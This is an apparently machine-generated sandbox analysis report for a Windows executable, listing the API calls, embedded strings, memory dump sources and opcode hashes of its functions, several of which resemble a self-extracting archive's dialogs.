                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008AC817
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008AC829
                                                              • _free.LIBCMT ref: 008AC83B
                                                              • _free.LIBCMT ref: 008AC84D
                                                              • _free.LIBCMT ref: 008AC85F
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: cb622abb0d045f5b6e3280d9fa122a67824065242658ecf826f4bdcf5579c330
                                                              • Instruction ID: 33668a9284f9833b8173f4355749f555ad162bf4ae3ac57e68ccac2e3b99edb7
                                                              • Opcode Fuzzy Hash: cb622abb0d045f5b6e3280d9fa122a67824065242658ecf826f4bdcf5579c330
                                                              • Instruction Fuzzy Hash: 36F01D72504200EFA620EB7CE986C5A73E9FB02754B645829F249D7D52CB74FC80CA75
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00891FE5
                                                              • _wcslen.LIBCMT ref: 00891FF6
                                                              • _wcslen.LIBCMT ref: 00892006
                                                              • _wcslen.LIBCMT ref: 00892014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0088B371,?,?,00000000,?,?,?), ref: 0089202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 1536c09fbb071e428c64afdb959e3b2e0b821d70c9a27814a00e3dd057ab460e
                                                              • Instruction ID: 85a7309c5216d01460621771949f7b0b30e20c210ffec26fb1118832437ab04a
                                                              • Opcode Fuzzy Hash: 1536c09fbb071e428c64afdb959e3b2e0b821d70c9a27814a00e3dd057ab460e
                                                              • Instruction Fuzzy Hash: 6DF06D32008018BBDF226F54EC09D8A3F26FB51770B118005F61A9B461CB729661D690
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008A891E
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008A8930
                                                              • _free.LIBCMT ref: 008A8943
                                                              • _free.LIBCMT ref: 008A8954
                                                              • _free.LIBCMT ref: 008A8965
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 4a98bf043db2db07cf44c90a2b4d33390dae09b8bd4dcf054553bb2dffbe510b
                                                              • Instruction ID: a46d85d8f5b23ef2e3c9551e86f90e2f75d2f048e069da927bbee53c45d3be1b
                                                              • Opcode Fuzzy Hash: 4a98bf043db2db07cf44c90a2b4d33390dae09b8bd4dcf054553bb2dffbe510b
                                                              • Instruction Fuzzy Hash: 2CF03AB5814162CB9A4A7F28FC824867FA9F7267107040706F215DB6B1DF7189419BA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: c6f81ad2ce395eba38eba54fdd53e8cd11b50871fd216ad99e1469240fd707d9
                                                              • Instruction ID: 7151b50380c61ea77408e2a958539c28da224bbd7a5b678152127a2d444d01c4
                                                              • Opcode Fuzzy Hash: c6f81ad2ce395eba38eba54fdd53e8cd11b50871fd216ad99e1469240fd707d9
                                                              • Instruction Fuzzy Hash: 8E51E67168C30BFAEE2236D48D4EF257665FB25B08F1C4516F386F44D1D5A29410B71B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\o9jDrpZrgR.exe,00000104), ref: 008A7FAE
                                                              • _free.LIBCMT ref: 008A8079
                                                              • _free.LIBCMT ref: 008A8083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                              • API String ID: 2506810119-2110599003
                                                              • Opcode ID: 04750459e41da4cfe18bb168b01c09292a608752a3ff34feaae3da10a34da3b2
                                                              • Instruction ID: 6383108bac69df3cf5757b2c21cb7a19cebea777919ccf80172bdb63bb0fa44c
                                                              • Opcode Fuzzy Hash: 04750459e41da4cfe18bb168b01c09292a608752a3ff34feaae3da10a34da3b2
                                                              • Instruction Fuzzy Hash: 92318DB1A04658EFEB21DF99DC8199EBBFCFB96310F104166E504DB611DA708A44CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008A31FB
                                                              • _abort.LIBCMT ref: 008A3306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: 2bedf975adeda2fad45e7be76f4c61321af21402595300669efce61a03d8bafb
                                                              • Instruction ID: 695ec70ad79b6a2c8222e0932464a64fcee4ffa62c1571a6aabbbf7bd2bc4a39
                                                              • Opcode Fuzzy Hash: 2bedf975adeda2fad45e7be76f4c61321af21402595300669efce61a03d8bafb
                                                              • Instruction Fuzzy Hash: 14417A71900209AFEF15DF98CC81AEEBBB5FF4A305F188059F904A7611E335EA50DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00887406
                                                                • Part of subcall function 00883BBA: __EH_prolog.LIBCMT ref: 00883BBF
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008874CD
                                                                • Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
                                                                • Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
                                                                • Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              • Opcode ID: 5148f7389cf943ce3d0905f8af8b3c54dc74593063a8fed9ad0df9cbb11fa969
                                                              • Instruction ID: db72dddacd37e4cb5c965ff0793524dd4567e2c8207c6164d46df438a02bef93
                                                              • Opcode Fuzzy Hash: 5148f7389cf943ce3d0905f8af8b3c54dc74593063a8fed9ad0df9cbb11fa969
                                                              • Instruction Fuzzy Hash: 1D319071904258AADF11FBA89C49FEE7BB9FB09314F144055F445E7282DB748A448B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089AD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0089ADAD
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0089ADC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              • Opcode ID: 741660b4294bcb7b0380f8435a6fd26f13f928441a12c720763bba3dbe3b6664
                                                              • Instruction ID: 816b342876d8cc12449fb501163d3b7f00e7c1054723245006efe3de98dd6d2d
                                                              • Opcode Fuzzy Hash: 741660b4294bcb7b0380f8435a6fd26f13f928441a12c720763bba3dbe3b6664
                                                              • Instruction Fuzzy Hash: 1A119632340200BFDF15AF68DC49F6A7769FB4A742F140410F241DB5A0C7619E4597A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 0088D954
                                                              • _strncpy.LIBCMT ref: 0088D99A
                                                                • Part of subcall function 00891DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008C1030,00000200,0088D928,00000000,?,00000050,008C1030), ref: 00891DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: 8993cb04932947b18f731d63e12f3ee01941a8c441f62e9d0e8c4626b96ad8a7
                                                              • Instruction ID: 4715d575b594bc327e4a381689b26c5379945251b67e21f1aa5b7b4e37245482
                                                              • Opcode Fuzzy Hash: 8993cb04932947b18f731d63e12f3ee01941a8c441f62e9d0e8c4626b96ad8a7
                                                              • Instruction Fuzzy Hash: 81213B72540348AAEF21EEA8CD45FEE7BE8FB05704F140512F920D62A2E675D6588B52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00890EB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: dc404ed10eef913e4aafb6c97c7de8bdc68d9d4b320ac8b66e9f38e7d738159b
                                                              • Instruction ID: 1f0212b869a88d43476c787491a1bf6b6f497d63e30d948c19419330f2c28462
                                                              • Opcode Fuzzy Hash: dc404ed10eef913e4aafb6c97c7de8bdc68d9d4b320ac8b66e9f38e7d738159b
                                                              • Instruction Fuzzy Hash: 4B1173B1A407099FC7216F7A9C849ABFBECFB59744F144C2EF1DAC2201D671A9418F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089B2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0089B2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0089B304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 445417207-3292211884
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00887F69,?,?,?), ref: 0088A3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00887F69,?), ref: 0088A43E
                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00887F69,?,?,?,?,?,?,?), ref: 0088A4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00887F69,?,?,?,?,?,?,?,?,?,?), ref: 0088A4C6
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008A91E0,?,00000000,?,00000001,?,?,00000001,008A91E0,?), ref: 008AC9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008ACA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008A6CBE,?), ref: 008ACA70
                                                              • __freea.LIBCMT ref: 008ACA79
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0089A666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0089A675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0089A683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0089A691
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0089A699: GetDC.USER32(00000000), ref: 0089A69D
                                                                • Part of subcall function 0089A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0089A6A8
                                                                • Part of subcall function 0089A699: ReleaseDC.USER32(00000000,00000000), ref: 0089A6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0089A83C
                                                                • Part of subcall function 0089AAC9: GetDC.USER32(00000000), ref: 0089AAD2
                                                                • Part of subcall function 0089AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0089AB01
                                                                • Part of subcall function 0089AAC9: ReleaseDC.USER32(00000000,?), ref: 0089AB99
                                                              Strings
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: (
                                                              • API String ID: 1061551593-3887548279
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008AB324
                                                                • Part of subcall function 008A9097: IsProcessorFeaturePresent.KERNEL32(00000017,008A9086,00000050,008B3A34,?,0088D710,00000004,008C1030,?,?,008A9093,00000000,00000000,00000000,00000000,00000000), ref: 008A9099
                                                                • Part of subcall function 008A9097: GetCurrentProcess.KERNEL32(C0000417,008B3A34,00000050,008C1030), ref: 008A90BB
                                                                • Part of subcall function 008A9097: TerminateProcess.KERNEL32(00000000), ref: 008A90C2
                                                              Strings
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 008875E3
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                                • Part of subcall function 0088A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0088777F
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532
                                                              Strings
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: 220fa160a2b78db68428d525532c9c4dc3aba186434b650ecdf027b7dabd3fc2
                                                              • Instruction ID: 62852977270108e6264634d526f350596b5e9d01a76db6aae42908f15dce3a37
                                                              • Opcode Fuzzy Hash: 220fa160a2b78db68428d525532c9c4dc3aba186434b650ecdf027b7dabd3fc2
                                                              • Instruction Fuzzy Hash: BF21047290430A5ADB31FA68EA45E6AB3DCFF92710F09042AF540C3601FB64DD5883A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0088F2E4
                                                                • Part of subcall function 0088F2C5: GetProcAddress.KERNEL32(008C81C8,CryptUnprotectMemory), ref: 0088F2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,0088F33E), ref: 0088F3D2
                                                              Strings
                                                              • CryptProtectMemory failed, xrefs: 0088F389
                                                              • CryptUnprotectMemory failed, xrefs: 0088F3CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: 64b65865ebd2c2eb52a8eb74a6bd0fb2c1eb814e94c07e065638fb53ae8636ee
                                                              • Instruction ID: 345cbf8f3af18a027ccf9a94afe1d045fe3945e9552564a3b0848906eeee5786
                                                              • Opcode Fuzzy Hash: 64b65865ebd2c2eb52a8eb74a6bd0fb2c1eb814e94c07e065638fb53ae8636ee
                                                              • Instruction Fuzzy Hash: 87112231600629ABDF12BF24DC45A6E3B65FF00760F14412AFD01EB393DB35AE018B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0088B9B8
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 1543624204-3142399695
                                                              • Opcode ID: 9d842161abec6b37061b9cf0d221644ab0e44eafce5a0bd54612bb0a4cfaa0ab
                                                              • Instruction ID: ee32f304b06b75e54df743c889ce5326f9f6a13f490dd963fc6acec5125b3ef3
                                                              • Opcode Fuzzy Hash: 9d842161abec6b37061b9cf0d221644ab0e44eafce5a0bd54612bb0a4cfaa0ab
                                                              • Instruction Fuzzy Hash: 0701F56350032269AA347B398C42D6BBBACFFD2770B40440AF545D6582FB20D85083B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00010000,00891160,?,00000000,00000000), ref: 00891043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0089108A
                                                                • Part of subcall function 00886C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00886C54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2655393344-3849766595
                                                              • Opcode ID: 8d329d8f8db0380658a6abee657ffbff3994db3f3f9144aa48be1a9ec856b981
                                                              • Instruction ID: b4cacabd23373716d066290364f254db314d370d6310b114410d36c0d12eebaa
                                                              • Opcode Fuzzy Hash: 8d329d8f8db0380658a6abee657ffbff3994db3f3f9144aa48be1a9ec856b981
                                                              • Instruction Fuzzy Hash: 0901DB7534870B6FDB307E649C99F7673A9FB40751F14002EF686D2381DBB1A8954724
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088E2E8: _swprintf.LIBCMT ref: 0088E30E
                                                                • Part of subcall function 0088E2E8: _strlen.LIBCMT ref: 0088E32F
                                                                • Part of subcall function 0088E2E8: SetDlgItemTextW.USER32(?,008BE274,?), ref: 0088E38F
                                                                • Part of subcall function 0088E2E8: GetWindowRect.USER32(?,?), ref: 0088E3C9
                                                                • Part of subcall function 0088E2E8: GetClientRect.USER32(?,?), ref: 0088E3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                              • SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0
                                                              • API String ID: 2622349952-4108050209
                                                              • Opcode ID: b74e5ea71c49e76b407df868860a247cc49714961450eaa04d6579b7b3dacdde
                                                              • Instruction ID: eda292d63c5025264faee37ad41edb2c12584f9ab1272333bb46b97257f249bc
                                                              • Opcode Fuzzy Hash: b74e5ea71c49e76b407df868860a247cc49714961450eaa04d6579b7b3dacdde
                                                              • Instruction Fuzzy Hash: D1F03C30144288ABDF252F65884DBEA3B6DFB45344F048618FD46D5AA2CF78CA96AB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00891206,?), ref: 00890FEA
                                                              • GetLastError.KERNEL32(?), ref: 00890FF6
                                                                • Part of subcall function 00886C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00886C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00890FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 3a07c23c397102f41c4ad38259be2a60e4beb35325539e79ebfb1be189033828
                                                              • Instruction ID: 1848b3a275791186850d768d6eedf80d63594f5f6740770aa5357b1900c8f2d2
                                                              • Opcode Fuzzy Hash: 3a07c23c397102f41c4ad38259be2a60e4beb35325539e79ebfb1be189033828
                                                              • Instruction Fuzzy Hash: 43D02B3150893276CE1033285D0AD6E7905FF12331F140704F138D03F2CB2549925392
                                                              Uniqueness

